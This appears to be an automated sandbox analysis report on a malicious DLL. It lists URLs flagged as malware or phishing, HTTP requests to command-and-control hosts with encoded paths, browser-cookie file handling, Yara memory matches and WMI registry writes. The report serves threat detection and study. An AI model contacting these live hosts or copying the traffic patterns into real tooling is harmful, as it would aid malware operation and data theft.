Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo | Avira URL Cloud: Label: malware |
Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0 | Avira URL Cloud: Label: malware |
Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/ | Avira URL Cloud: Label: malware |
Source: http://c56.lepini.at/jvassets/xI/t64.dat | Avira URL Cloud: Label: phishing |
Source: http://golang.feel500.at/favicon.ico | Avira URL Cloud: Label: malware |
Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE | Avira URL Cloud: Label: malware |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, | 0_2_009C888D |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, | 0_2_009BE0BA |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, | 0_2_009D4FE1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, | 1_2_00CA888D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, | 1_2_00C9E0BA |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, | 1_2_00CB4FE1 |
Source: global traffic | HTTP traffic detected: GET /api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: go.in100k.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: go.in100k.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /api1/tImL8jZlII9uy/Sa8Z12vW/JG0sDCYv96mnYtDsn1Jnt3e/XYTd0GATXg/XwcDwpCd2vvNyexYh/5IBZNKPDd82e/Sfq1uBktd3t/JAcKip5_2F1iiz/RPTyTdp7IDHiXyZe31kKi/YwPGUHlbAVrZQiJG/SzxK0AoLMu7pJz8/amcTh_2FxtM1YghDIM/RJhzMBJ32/UeEsYhC9E1juxsvgDHu2/XGHdHL4mrBZhgHYHQrE/_2FfBJOhnZDsrt5kghDKCq/x6jFt9w2z9sQ_/2BbtS3lh/ua5XHXz43d5GTeWt38fFqSh/tbGXpr_2B/jQf9TsE9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /api1/WpBs3eblZL2bM/eqngm5Qw/I8JSfPJ_2Fa8Gc3pObm8uim/9flcMVIzEU/MRqomoxt8Q2O1JJ03/ZSj1o2HmPZtK/O9QP218enUp/m1K_2FgloiW3rF/oEuojNadbJqe6VOrFglrs/Ndi7e_2Br7N9yDeG/5hb81boaOqEuw3E/kxHEh7CU8L_2FQm9GN/dbnlxd_2B/J8a13_2FHiOHS5rUu68O/mOTX7eo0S_2BSz_2F55/SPIJ116DNn5HQ6QSsDbLuG/U7BuZ1ELETSnp/HKm0Yev_/2BYuFboTfZStfkhwMh7_2Fr/vWxqAs_2B4/ppPPRk2wwNFmF70Ei/cPOuG4TRxPLy6vkSp/GbYUyI HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: go.in100k.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: go.in100k.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at |
Source: global traffic | HTTP traffic detected: GET /api1/5I7pLP9QNe/N5buyckYCrgoPqvPA/NjC86WmFUumJ/d5ZJk2tc_2B/naCfPReUYVV3Vx/ldXi9UGRyYBJQ_2Fncfms/yLLq_2F_2FAO72XM/I_2BWOGHGpoip8O/L_2FeZA1PRI5XY_2BB/j3rs0r3Qi/LjAFf6GJs2hLttaGlvqk/QXt9zzN9fNRamdHdcye/Eig_2Fsi5CrdV1iAkxdGXk/dY8xK6yf2XhnW/0wyvHV0p/pz8P8_2FIx_2BIgHiQgkzmF/pVcGr3XY_2/F0IzfpDiL0qRGlWkz/h5CX5vmyOkVW/KUlweXnwefm/x2MMNvATag8_2F/nIODL_2BJ417QebINK55v/VFjAtH9us6H/2M HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: global traffic | HTTP traffic detected: GET /api1/PA66UeKSfQRT_2Fcj/iLfHO8gQWTV6/hOef_2Bpj3m/vKET8aGISBfnMY/C7Rg8qWLOVBJvNGoXa3bh/JqG7kZOU_2B7n24F/sOI2F2WFZ1YAPkN/T_2BsNeHboXzrn7jqx/15bjKyLUT/gDA9ARyVldWTTyiXOC6v/tXtwdM8cZwpPI2KIOCU/YL8nL41xllyGRALppW8L48/k1SWSYBtfCxFZ/fJXP1vjj/fSbg8F1Si24u64v54ydTM3o/jeiSZAFtwp/B6QKlmIvy6M21AUkZ/3j_2BqQ9D79g/1CFMkegOFCy/pEDZCVezoXWN_2/Bc4g_2B7Dm/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: global traffic | HTTP traffic detected: GET /api1/YULajG8YI4XFMV/YmAg5JNx_2FDNG7TuSVBW/rDRyxARgDEEEuHQw/evIJnvp2g7SCy8L/bJrKo5atF48FzBlZet/fbl2Ha7GH/_2BH9MOFklEvfboI7qgC/aeuT1qWtgUC6wBSbBT9/_2BAmM7g9d5p3WEfySPQlF/ssCzZKRVALgEk/sp0I8w6X/DrAFLFSHvA1oX_2BP0tpKNl/ZAxxPEdckm/yZJPnbWMUA7uRge39/ml3K2b_2FU2A/XzCLaq3SmxR/10nkXEQkMm0VbN/VC8xNzQeSqT1Wl479mf3g/IZqBR2_2FJ_2BQ8j/wVSGqvItzNt/3rN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at |
Source: loaddll32.exe, rundll32.exe, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 0000001E.00000003.614713182.00000232FA37D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: rundll32.exe, 00000001.00000003.542325936.0000000000C41000.00000004.00000001.sdmp | String found in binary or memory: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/ |
Source: rundll32.exe, 00000001.00000002.619811108.0000000000BE2000.00000004.00000001.sdmp | String found in binary or memory: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo |
Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000001E.00000002.617070310.00000232E1ED1000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.613638611.0000018F5E0F1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY |
Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_009B5ECA |
Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie | 0_2_009B5ECA |
Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_009B5ECA |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 1_2_00C95ECA |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie | 1_2_00C95ECA |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 1_2_00C95ECA |
Source: Yara match | File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
